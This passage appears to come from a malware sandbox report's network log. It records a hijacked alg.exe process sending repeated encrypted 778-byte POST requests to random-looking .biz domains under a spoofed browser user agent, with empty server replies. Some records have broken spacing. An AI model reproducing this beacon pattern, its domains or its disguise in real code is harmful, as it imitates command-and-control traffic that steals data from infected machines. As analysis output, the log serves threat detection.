91 | 192.168.2.5 | 50067 | 13.251.16.150 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:10.371886015 CET | 350 | OUT | POST /ysihuw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: shpwbsrw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:10.371917963 CET | 778 | OUT | Data Raw: 36 79 fd fb 0e a0 bd 57 fe 02 00 00 61 cd bd eb 8f 8b 40 e3 d4 6c 3c 7b 0e 61 74 32 ed 88 04 fe a5 1f 6b aa 3e ef 6e e6 03 8b b5 c1 2a 70 21 3a 75 4f d2 f9 7d f3 fd 79 82 b8 90 10 30 5c 3a b3 89 22 59 8f e6 e8 17 8c 0e bc b9 c3 a1 e3 fe d6 23 34
Data Ascii: 6yWa@l<{at2k>n*p!:uO}y0\:"Y#4o]'h3xLz05zhA$cMHWc93Ij^yO!8B'ECgBzU[<[%i*u$/pG$YM(EMF-'{8
Oct 28, 2024 16:52:11.836721897 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=64916621fa3f43fcc8fee95264eaef8f|155.94.241.188|1730130731|1730130731|0|1|0; path=/; domain=.shpwbsrw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.5 | 50068 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:11.859622955 CET | 350 | OUT | POST /cbrxaago HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cjvgcl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:11.859649897 CET | 778 | OUT | Data Raw: 58 6a de f6 03 cf c2 57 fe 02 00 00 40 e6 55 44 df 72 a3 bc 92 ba 75 e8 ce 1c a6 99 ec e3 fc 35 57 14 7d 1d 32 4e 8d 20 e5 66 1f b5 8a 30 12 5e 0a 14 07 87 f3 3f 34 63 2b 83 b4 75 f4 1d dc c8 a1 5d 39 58 a1 b1 ef 5c 66 99 e1 65 ae 5e 0e 87 f1 a9
Data Ascii: XjW@UDru5W}2N f0^?4c+u]9X\fe^Jj6@rx;KT5>acA$"x|=wGW6m]mLSEy>\om_*TMG0H*I7~J*d.N ?;t`l,r$z9}
Oct 28, 2024 16:52:12.522706032 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ac6ea345b9a274c0bdfb90f64cc2363b|155.94.241.188|1730130732|1730130732|0|1|0; path=/; domain=.cjvgcl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.5 | 50069 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:12.548007011 CET | 357 | OUT | POST /herwmjqyyara HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: neazudmrq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:12.548091888 CET | 778 | OUT | Data Raw: 1f c2 d4 1e 6e e5 78 4a fe 02 00 00 8f 07 22 7f df 8e 3b c4 60 83 95 b3 bb c6 af 03 bc df 1e 8d cc 9d c3 15 f2 75 f6 4c 2b 63 3d ff 63 e0 c6 74 45 4f 2f 5c 8c 98 fb e8 3f f5 91 0f 06 75 8e a5 0f 52 eb ba 8b 9d 81 2b 26 cc 7d 48 d7 26 c6 fd 4b 36
Data Ascii: nxJ";`uL+c=ctEO/\?uR+&}H&K6M^GoGT|!d,WVS!tZ?{iFIM)Au~YXt3ZA|2<+AT/\CnDEga_>Zk#, AD~''
Oct 28, 2024 16:52:13.222980022 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=47d4f979fa8d43d7b8be7c763345abe0|155.94.241.188|1730130733|1730130733|0|1|0; path=/; domain=.neazudmrq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.5 | 50070 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:13.336462975 CET | 350 | OUT | POST /vtxunog HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: pgfsvwx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.336535931 CET778OUTData Raw: 16 cb 82 06 f1 7d e0 d0 fe 02 00 00 9c b4 e6 64 9b 7e 0a 8a 91 62 a9 91 69 36 10 02 62 94 3c d4 47 79 b7 e3 0c bc 3b 38 91 52 00 75 14 23 b1 20 0e 80 87 49 97 60 ac 38 80 81 28 36 85 1c ff b4 aa d3 8c 48 bb b0 fe ec 50 45 b5 4e 23 7c 36 71 7c dc
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: }d~bi6b<Gy;8Ru# I`8(6HPEN#|6q|Q<C44Bi,'4:sB1iVwSX+#JQ#gFZ3^l`haVG~=O9y>iT^APuzz749
Oct 28, 2024 16:52:13.998702049 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=f17e49057007e04b9e52997456a252a3|155.94.241.188|1730130733|1730130733|0|1|0; path=/; domain=.pgfsvwx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.5 | 50071 | 47.129.31.212 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:14.020118952 CET | 355 | OUT | POST /ataqclhdwkpjy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: aatcwo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.020148039 CET778OUTData Raw: dc 23 78 2e 5c 93 97 c3 fe 02 00 00 80 e3 88 53 65 f3 3f 78 46 b0 34 21 53 97 12 30 2e 0c 10 97 1e a0 cc a6 62 8b df 4e f5 a6 42 be bd 33 42 b0 dd f0 12 c1 11 2d c2 d7 d1 a8 7f 08 50 c8 d4 76 48 0e 60 6c e7 52 2c 54 84 e9 d1 e8 4d 58 82 5e c0 9d
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: #x.\Se?xF4!S0.bNB3B-PvH`lR,TMX^,{^KZ@?7aa~RH-S.nsimx |-{Dr8-'dPTz{GbeuJJ6W2[|bL@-J8Z
Oct 28, 2024 16:52:15.880515099 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=102f53bb9f6eea9d7b9d4432e372649d|155.94.241.188|1730130735|1730130735|0|1|0; path=/; domain=.aatcwo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
Oct 28, 2024 16:52:15.880718946 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=102f53bb9f6eea9d7b9d4432e372649d|155.94.241.188|1730130735|1730130735|0|1|0; path=/; domain=.aatcwo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.5 | 50072 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:15.902965069 CET | 353 | OUT | POST /ruuxvcxs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: kcyvxytog.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.903019905 CET778OUTData Raw: c7 d1 92 27 8f ce dc c3 fe 02 00 00 a7 f4 05 4f 89 99 8e fc 60 a3 84 df 4f 3c 69 e5 6f 2f f2 29 c9 c6 ca 75 34 fe 78 8c 62 b4 02 42 45 9d 08 c4 59 10 62 bc 25 e2 ab ca 57 bf 05 b9 10 66 f9 d1 63 9e 33 ce 0d d1 79 b4 50 3d e4 6b ef c2 08 23 41 6d
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 'O`O<io/)u4xbBEYb%Wfc3yP=k#AmiNBt#bce@Zv+mDC#c]4H)5"i4K]T0_t#GclT0/.^Jcx%>cvJH*S;$:c*R
Oct 28, 2024 16:52:16.570225000 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=8b721e60349fffd3b19fb018a1a9b8cf|155.94.241.188|1730130736|1730130736|0|1|0; path=/; domain=.kcyvxytog.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.5 | 50073 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:16.592303991 CET | 355 | OUT | POST /exbxilbdfwja HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: nwdnxrd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.592336893 CET778OUTData Raw: 8b 2c bf 4f b0 8d 6a 25 fe 02 00 00 58 7a 05 c0 8b dc 7e 47 be 7f 11 c1 2b dc 1b a5 0c e5 6b 0a 36 05 f8 73 30 4a 83 b1 9a 5a 8d 5f 43 1f dc 75 b9 f6 36 ac d8 ee f5 ba 80 81 a2 51 f4 54 91 84 f0 ae e3 04 a2 0f 99 7e c0 ef 2d bf 1e 4d 2f ec 00 5b
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ,Oj%Xz~G+k6s0JZ_Cu6QT~-M/[va`#Eq+GyMoqYqV6`ly!;oox+^R{LgX1hz :%H(xc7Ys4r_:Z^!i6G:GTKe4
Oct 28, 2024 16:52:17.427901030 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=250ad26713d244d7ad73c10e237e14e3|155.94.241.188|1730130737|1730130737|0|1|0; path=/; domain=.nwdnxrd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.5 | 50074 | 18.246.231.120 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:17.449295044 CET | 347 | OUT | POST /htae HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ereplfx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.449332952 CET778OUTData Raw: 83 19 33 01 36 e9 4e 54 fe 02 00 00 e4 48 ea 75 29 f7 14 11 54 3e 17 67 df 5b dc db f4 3e 9f 14 44 86 f2 27 48 06 7c 06 95 ef 65 dd 03 b2 54 88 c1 38 c1 e0 53 7f 08 25 8e d7 61 55 be 90 c4 83 10 44 6d ac 81 f2 1f 7a ed 8d 12 dc 77 7a b7 2b b8 7a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 36NTHu)T>g[>D'H|eT8S%aUDmzwz+zd&d-)KID&#2lXln^$E]n&b:Mdx7v9c#73sYpT+-7{a)p iU9'=GVA.Y'}>%|[Sp[0
Oct 28, 2024 16:52:18.271089077 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=4a2f35b072c3b9f914bf45de635a9494|155.94.241.188|1730130738|1730130738|0|1|0; path=/; domain=.ereplfx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.5 | 50075 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:18.294682026 CET | 346 | OUT | POST /vkhuh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ptrim.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.294738054 CET778OUTData Raw: 44 44 5b bf c8 82 82 e8 fe 02 00 00 dd 5d 67 bd ab 1a 8d 51 66 5d dc 4a 41 86 5c e3 9c 07 63 a6 4f c0 e7 91 d1 10 a9 1b 46 a9 d7 86 5a 84 60 99 12 e4 2d 26 5e 22 39 b4 b5 39 97 06 ca 13 9f 22 63 bf 4e 93 7a ec 7f 99 c0 56 96 2a f8 64 0d 3b 1f 40
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: DD[]gQf]JA\cOFZ`-&^"99"cNzV*d;@W^UY [/*KC!|#2=.:*ym8{?r[v-,f0^s/QK;)[_<O3G\l]^*{bMoKrrnG? PIYB
Oct 28, 2024 16:52:20.084760904 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=e19b52423f1ec9acccd375d107203c1c|155.94.241.188|1730130739|1730130739|0|1|0; path=/; domain=.ptrim.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
Oct 28, 2024 16:52:20.084997892 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=e19b52423f1ec9acccd375d107203c1c|155.94.241.188|1730130739|1730130739|0|1|0; path=/; domain=.ptrim.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.5 | 50076 | 47.129.31.212 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:20.104408026 CET | 350 | OUT | POST /wtmpt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: znwbniskf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:20.104423046 CET | 778 | OUT | Data Raw: 64 d1 fa e3 eb bb fc da fe 02 00 00 3a c0 ee 08 33 54 71 ec 77 d7 6a 42 15 5e eb a6 11 d5 cf f5 41 68 46 8a 2e 20 13 ab 0b bb c2 e2 00 26 47 0e 72 1a c9 05 45 c0 81 ec 13 45 18 57 f5 73 81 f0 ca 47 9d da c3 57 d3 5b 84 06 db 07 96 c2 0a cf 6c 93
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: d:3TqwjB^AhF. &GrEEWsGW[l'!2qsT([7533fI_<wX=)zb<KGt|LIk`z{i:X{=ss6h~F<\TW+#HJS9%)N:_L
Oct 28, 2024 16:52:21.532591105 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=3baea37bd29011a9f10616e28caeef1c|155.94.241.188|1730130741|1730130741|0|1|0; path=/; domain=.znwbniskf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.5 | 50077 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:21.555071115 CET | 357 | OUT | POST /neaxbjvxiqaxty HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cpclnad.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:21.555151939 CET | 778 | OUT | Data Raw: ed 6b 1b fd 30 fe 93 48 fe 02 00 00 e3 21 c0 6c 3e f2 42 7d 06 61 87 a2 bc ac bb 79 1c c3 05 8b c0 ed af 19 8c 80 92 56 fb ea c7 07 8e fe 77 90 be ef b1 2e ab 2d d7 70 03 36 cd c5 f6 0f ca a0 9c bb 1b 99 fb 37 b4 58 0e 05 25 7e 97 d4 3d fb ba a7
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: k0H!l>B}ayVw.-p67X%~=#,7dyjDEJ%(/,n6k`>"BtVtiiVkt78Dw+$"p$ZkC]iD5Nlyd0&Y|$4&MZ@
Oct 28, 2024 16:52:22.219712019 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
